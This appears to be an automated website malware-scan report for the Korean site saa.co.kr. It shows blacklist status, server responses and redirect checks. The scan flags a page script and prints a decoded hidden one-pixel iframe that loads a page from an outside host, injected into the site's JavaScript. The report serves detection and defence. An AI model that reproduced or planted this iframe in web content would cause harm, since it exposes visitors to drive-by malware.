Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=saa.co.kr
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://saa.co.kr/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://saa.co.kr/ | HTTP/1.1 302 Object moved Cache-Control: private Connection: close Date: Wed, 14 Jan 2015 00:14:20 GMT Location: /main/main.asp Server: Microsoft-IIS/5.0 Content-Length: 141 Content-Type: text/html; Charset=EUC-KR Set-Cookie: ASPSESSIONIDASRRATTC=ABKDJEBCKCAGOHGFMNJMKMPO; path=/ | clean |
http://saa.co.kr/main/main.asp | 200 OK Content-Length: 32243 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.sellcarauction.co.kr <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <script> function ViewGrp(metal_kind) { noticeWindow = window.open('/chart.asp?metal_kind='+metal_kind, "Window", "toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,width=317,height=330"); noticeWindow.opener = self; } function load() ...[4407 bytes skipped]... | ||
http://saa.co.kr/main/../js/common.js | 200 OK Content-Length: 2674 Content-Type: application/x-javascript | clean |
http://saa.co.kr/../js/spargon.js | 200 OK Content-Length: 2853 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame. var InsertMessage = function(obj) {
var obj = eval("document.getElementsByName('" + obj + "')"); var obj_value = obj[0].value; var chk_length = (obj_value.replace(/\s/g,"")).length; if ( chk_length < 1 ) { document.getElementById("input_message").innerHTML += "<font color='red'>¡Ü</font> " + obj[0].alt + "¸¦ ÀÔ·ÂÇϼ¼¿ä<br/>"; return false; } } var NullCheckStart ...[2498 bytes skipped]... Decoded script: <iframe src='http://syochem.iunii.com/swf/_notes/view.html' width='60' height='1' frameborder='0'></iframe> | ||
http://log.inside.daum.net/dwi_log/js/dwi.js | 500 Can't connect to log.inside.daum.net:80 Content-Length: 194 Content-Type: text/plain | clean |
http://log.inside.daum.net/test404page.js | 500 Can't connect to log.inside.daum.net:80 Content-Length: 194 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: saa.co.kr
Result:
HTTP/1.1 302 Object moved
Cache-Control: private
Connection: close
Date: Wed, 14 Jan 2015 00:14:20 GMT
Location: /main/main.asp
Server: Microsoft-IIS/5.0
Content-Length: 141
Content-Type: text/html; Charset=EUC-KR
Set-Cookie: ASPSESSIONIDASRRATTC=ABKDJEBCKCAGOHGFMNJMKMPO; path=/
...141 bytes of data.
GET / HTTP/1.1
Host: saa.co.kr
Result:
HTTP/1.1 302 Object moved
Cache-Control: private
Connection: close
Date: Wed, 14 Jan 2015 00:14:20 GMT
Location: /main/main.asp
Server: Microsoft-IIS/5.0
Content-Length: 141
Content-Type: text/html; Charset=EUC-KR
Set-Cookie: ASPSESSIONIDASRRATTC=ABKDJEBCKCAGOHGFMNJMKMPO; path=/
...141 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: saa.co.kr
Referer: http://www.google.com/search?q=saa.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: saa.co.kr
Referer: http://www.google.com/search?q=saa.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.